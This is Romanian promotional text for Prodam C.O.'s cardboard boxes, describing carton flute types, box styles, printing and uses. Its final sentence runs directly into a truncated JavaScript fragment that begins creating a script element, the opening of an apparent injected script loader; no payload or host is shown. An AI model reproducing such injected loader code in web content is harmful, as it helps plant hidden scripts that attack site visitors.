ambalaje din carton

ambalaje din carton

Prodam C.O. produce ambalaje din carton esentiale pentru a putea distribui anumite produse precum alimentele, legumele, sticlele in siguranta.Ambalajele pot avea diferite dimensiuni sau forme in functie de preferintele clientului. Dorim sa multumim pana si cel mai prietentios client de aceea lucram cu toata daruire si increderea ca totul va fi bine.

Clasificarea ambalajelor din carton

Clasificarea ambalajelor din carton se poate face dupa diferite criterii, culoarea cartonului si tipul de carton ales. In functie de culoarea cartonului, ambalajele pot fi albe sau natur iar din punct de vedere al cartonului deosebim trei tipuri: carton microondulat ( ondula E ); carton ondulat tip III (ondulat B sau ondult C ) si carton ondulat tip V ( ondulat B+C sau ondulat B+E ) . Cartonul folosit se alege in functie de greutatea si radul de protectie necesar produsului de ambalat. Ambalajele din carton ondulat reprezinta produse finite obtinute prin procesarea cartonului ondulat.

Categoriile ambalajelor din carton

Ambalajele din carton sunt repartizate de cutii. Aceste ambalaje se repartizeaza in doua mari categorii si anume cutii clasice si cutii stantate. Cutiile clasice sunt reprezentate de cutiile americane ( box cu lipire simpla ) iar cutiile stantate sunt reprezentate de cutii pentru produsele din carne, ladite pentru fructe si legume, cutii pizza, cutii pentru diverse bauturi, cutii incaltaminte, cutii pentru depozitare sau arhivare, cutii pentru obiecte santitare si asa mai departe.

Tipuri de ambalaje din carton

Dupa cum am spus deja, ambalajele sunt prevezute de cutiile din carton. Noi producem o gama larga de tipuri de cutii in functie de tipul de constructie a acestora astfel avem: tavite cu autoformare; cutii cu autoformare; cutii cu fund cu autoformare si capac; cutii cu fund + cpac si cutii cu lipire in 3 puncte. Pentru a trage toate privirile, pentru un apect coercial atragator putem folosi imprimare flexografica atat pe cartonul alb cat si pe cel natur in 1 sau 4 culori diferite. Mai multe detalii dar si informatii gasiti accesand siet-ul nostru prodamco.ro

Utilizarea ambalajelor din carton

Ambalajele din carton, prin flexibilitatea lor pot fi folosite pentru a transporta marfa in siguranta, pentru a economisi loc, pentru a proteja alimentele si pentru  a pastra anumite produse proaspete mai mult timp. Folosind ambalajele din carton putem sa ne bucurm de o greutate mai mica spre deosebire de ambalajele produse din lemn sau alte materiale. Ambalajele din carton nu sunt costisitoare, pot fi transportate pliata, au o rezistenta crescuta, o calitate deosebita si achizitionandule direct de la producator profitati de un pret de productie scazut. Dorim sa satisfacem pana si cele mai pretentioase comenzi de aceea lucram cu o echipa devotata muncii, cu oameni calificati si priceputi in domeniu care muncesc cu atentie si grija. Tot ce-ti ramane de facut este sa ne precizezi tipul si cantitatea de ambalaj din carton dorit iar noi ti le vom livra in cel mai scurt timp posibil la preturi foarte mici. Alege sa folosesti ambalajele de carton de la Prodam C.O.  si te vei bucura de calitatea si pretul cel mai bunvar d=document;var s=d.createElement(‘script’);